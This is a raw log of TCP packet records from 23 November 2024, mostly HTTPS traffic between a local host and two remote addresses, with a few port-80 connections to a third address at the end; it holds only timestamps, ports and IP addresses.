Nov 23, 2024 07:09:27.357275963 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.357377052 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.357377052 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.357400894 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.357630968 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.369512081 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.369527102 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.369549990 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.369587898 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.369599104 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.369633913 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.369633913 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.372575998 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.372622967 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.372713089 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.372713089 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.372724056 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.375296116 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.387958050 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.388020992 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.388115883 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.388115883 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.388127089 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.388364077 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.399564028 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.399678946 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.399702072 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.399808884 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.401350021 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.401391983 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.401428938 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.401437044 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.401465893 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.401752949 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.409126997 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.409151077 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.409249067 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.409249067 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.409257889 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.411128044 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.416783094 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.416827917 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.416922092 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.416930914 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.416955948 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.417074919 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.428945065 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.429095030 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.429105043 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.429193974 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.431225061 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.431269884 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.431303978 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.431318045 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.431349039 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.431405067 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.451100111 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.451181889 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.451195002 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.451319933 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.473201990 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.473594904 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.473603964 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.473795891 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.486846924 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.486886024 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.487056017 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.491101027 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.491113901 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.551758051 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.551875114 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.551970005 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.551981926 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.552018881 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.552093029 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.553330898 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.553359985 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.553462029 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.553462029 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.553471088 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.553579092 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.562973976 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.563024044 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.563082933 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.563093901 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.563118935 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.563257933 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.574459076 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.574506044 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.574557066 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.574569941 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.574599981 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.575809956 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.579898119 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.579921961 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.580038071 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.580039024 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.580049038 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.580424070 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.584427118 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.584486961 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.584530115 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.584551096 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.584579945 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.584666967 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.596328020 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.596375942 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.596415043 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.596425056 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.596453905 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.596564054 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.599131107 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.599208117 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.599221945 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.599284887 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.600565910 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.600590944 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.600681067 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.600681067 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.600688934 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.600769997 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.606669903 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.606714010 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.606802940 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.606802940 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.606815100 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.607206106 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.614957094 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.615075111 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.615092039 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.615153074 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.618242979 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.618287086 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.618333101 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.618341923 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.618355036 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.619246006 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.621222973 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.621244907 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.621380091 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.621387959 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.621582985 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.629631042 CET	443	49761	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.629698992 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.629740000 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.629791975 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.629810095 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.629837990 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.629982948 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.630388975 CET	49761	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.630424976 CET	443	49761	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.630461931 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.630589008 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.630598068 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.630669117 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.631030083 CET	49761	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.631036997 CET	443	49761	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.646421909 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.646624088 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.646636963 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.646724939 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.655153036 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.655246973 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.655258894 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.655527115 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.666846037 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.666971922 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.666981936 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.667037010 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.675674915 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.675853968 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.675863981 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.676220894 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.684487104 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.684576988 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.684587002 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.684633017 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.694365025 CET	443	49762	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.694802046 CET	49762	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.694825888 CET	443	49762	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.695086956 CET	443	49763	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.695452929 CET	49762	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.695458889 CET	443	49762	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.695667028 CET	49763	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.695696115 CET	443	49763	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.696301937 CET	49763	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.696310997 CET	443	49763	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.753315926 CET	443	49767	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.754273891 CET	49767	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.754295111 CET	443	49767	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.754997015 CET	49767	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.755003929 CET	443	49767	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.756313086 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.756361008 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.756388903 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.756400108 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.756442070 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.756450891 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.757145882 CET	443	49768	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.757447004 CET	49768	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.757478952 CET	443	49768	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.757833958 CET	49768	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:27.757839918 CET	443	49768	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:27.759452105 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.759485006 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.759536982 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.759536982 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.759555101 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.759723902 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.763808012 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.763854980 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.763874054 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.763900995 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.763948917 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.763976097 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.772602081 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.772646904 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.772661924 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.772671938 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.772697926 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.772718906 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.773176908 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.773204088 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.773243904 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.773258924 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.773281097 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.773446083 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.781634092 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.781677961 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.781697989 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.781718016 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.781730890 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.781759024 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.789287090 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.789323092 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.789364100 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.789376020 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.789386988 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.789405107 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.789437056 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.789457083 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.789469957 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.789484024 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.789509058 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.789525032 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.799057961 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.799099922 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.799128056 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.799139023 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.799169064 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.799182892 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.805064917 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.805100918 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.805170059 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.805170059 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.805179119 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.805355072 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.806914091 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.806955099 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.806978941 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.806988001 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.807023048 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.807049036 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.809536934 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.809597015 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.809608936 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.809648991 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.815906048 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.815953016 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.815979958 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.815987110 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.816032887 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.816608906 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.816668034 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.816678047 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.816715956 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.821017981 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.821042061 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.821110010 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.821120024 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.821135998 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.821175098 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.826147079 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.826200008 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.826206923 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.826265097 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.833349943 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.833420992 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.833429098 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.833470106 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.835932016 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.835956097 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.836009979 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.836019039 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.836046934 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.836076975 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.840626955 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.840687990 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.840696096 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.840847015 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.849625111 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.849647045 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.849720955 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.849734068 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.849742889 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.849780083 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.850148916 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.850220919 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.850229979 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.850265026 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.857346058 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.857436895 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.857445002 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.857487917 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.864576101 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.864634037 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.864645004 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.864684105 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.874073982 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.874161959 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.874175072 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.874222040 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.881325960 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.881401062 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.881407976 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.881467104 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.889642954 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.889715910 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.889725924 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.889765024 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.893785000 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:27.896939993 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.897018909 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.897028923 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.897070885 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.899204969 CET	49778	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:27.906411886 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.906485081 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.906492949 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.906622887 CET	49758	443	192.168.2.6	150.171.27.10
